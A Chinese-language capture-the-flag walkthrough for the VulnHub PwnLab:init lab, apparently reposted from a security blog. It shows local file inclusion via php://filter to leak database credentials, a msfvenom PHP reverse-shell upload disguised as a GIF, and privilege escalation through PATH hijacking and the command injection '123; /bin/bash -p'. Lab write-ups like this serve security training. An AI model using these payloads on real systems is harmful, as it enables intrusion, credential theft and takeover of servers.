虚拟机信息
虚拟机下载地址:
https://www.vulnhub.com/entry/pwnlab-init,158/
虚拟机简介:这个 CTF 的目的是获取root并读取de标志
目标:/root/flag.txt
级别:初级
1、主机探测
1、通过netdiscover检测主机IP地址
arp-scan 192.168.207.0/24
2、服务探测
1、通过nmap进行端口扫描
nmap -A -sS -sV -v -p- 192.168.207.139
查看开放80、111、3306、53614端口
3、渗透测试
3.1 WEB渗透
1.访问站点进行测试
2.网站测试
nikto -host http://192.168.207.139
3.LFI文件包含
查看网页包含login页面,但测试未成功
测试使用php参数进行包含config.php
http://192.168.207.139/?page=php://filter/convert.base64-encode/resource=config
4.解码base64
echo PD9waHANCiRzZXJ2ZXIJICA9ICJsb2NhbGhvc3QiOw0KJHVzZXJuYW1lID0gInJvb3QiOw0KJHBhc3N3b3JkID0gIkg0dSVRSl9IOTkiOw0KJGRhdGFiYXNlID0gIlVzZXJzIjsNCj8+ | base64 -d
获取到数据库的用户名和密码信息
5.进入数据库查看
mysql -u root -h 192.168.207.139 -pH4u%QJ_H99
show databases;
use Users;
select * from users;
获取到登录用户名和密码
6.以kent用户登录
解密用户密码,并登录账号
7.生成反弹shell
msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.207.130 LPORT=4444 -f raw > shell.php
8.使用burp进行上传
修改文件后缀为GIF,并且在请求内容中添加GIF87a
并获取到图片上传位置
9.执行图片马
由于无法操作图片马,查看index页面配置
echo PD9waHANCi8vTXVsdGlsaW5ndWFsLiBOb3QgaW1wbGVtZW50ZWQgeWV0Lg0KLy9zZXRjb29raWUoImxhbmciLCJlbi5sYW5nLnBocCIpOw0KaWYgKGlzc2V0KCRfQ09PS0lFWydsYW5nJ10pKQ0Kew0KCWluY2x1ZGUoImxhbmcvIi4kX0NPT0tJRVsnbGFuZyddKTsNCn0NCi8vIE5vdCBpbXBsZW1lbnRlZCB5ZXQuDQo/Pg0KPGh0bWw+DQo8aGVhZD4NCjx0aXRsZT5Qd25MYWIgSW50cmFuZXQgSW1hZ2UgSG9zdGluZzwvdGl0bGU+DQo8L2hlYWQ+DQo8Ym9keT4NCjxjZW50ZXI+DQo8aW1nIHNyYz0iaW1hZ2VzL3B3bmxhYi5wbmciPjxiciAvPg0KWyA8YSBocmVmPSIvIj5Ib21lPC9hPiBdIFsgPGEgaHJlZj0iP3BhZ2U9bG9naW4iPkxvZ2luPC9hPiBdIFsgPGEgaHJlZj0iP3BhZ2U9dXBsb2FkIj5VcGxvYWQ8L2E+IF0NCjxoci8+PGJyLz4NCjw/cGhwDQoJaWYgKGlzc2V0KCRfR0VUWydwYWdlJ10pKQ0KCXsNCgkJaW5jbHVkZSgkX0dFVFsncGFnZSddLiIucGhwIik7DQoJfQ0KCWVsc2UNCgl7DQoJCWVjaG8gIlVzZSB0aGlzIHNlcnZlciB0byB1cGxvYWQgYW5kIHNoYXJlIGltYWdlIGZpbGVzIGluc2lkZSB0aGUgaW50cmFuZXQiOw0KCX0NCj8+DQo8L2NlbnRlcj4NCjwvYm9keT4NCjwvaHRtbD4= | base64 -d
lang添加了一个 ' ' cookie 来加载 ' en.lang.php' 文件
10.创建MSF监听服务
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.207.130
run
11.配置cookie
添加cookie内容,名称为lang,内容为图片地址:../upload/b5e9b4f86ce43ca65bd79c894c4a924c.gif
刷新页面获取到反弹shell连接
3.2 系统渗透
1.切换用户
由于已经有三个用户的密码信息,切换到用户进行测试,登录kane用户
python -c 'import pty; pty.spawn("/bin/bash")'
su - kane
发现有一个可执行文件属于mike用户
2.执行文件查看
./msgmike
3.修改环境变量信息
echo "/bin/bash" > /tmp/cat
chmod +x /tmp/cat
PATH=/tmp:$PATH
./msgmike
已经切换为mike用户
4.进入mike用户
cd /home/mike
查看文件内容为可执行方式
5.查看文件执行方式
./msg2root
输入内容会有相关输出
6.账号提权
./msg2root
123; /bin/bash -p
7.获取flag信息
cd /root
more flag.txt
原文始发于微信公众号(安全孺子牛):OSCP难度靶机之PwnLab
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论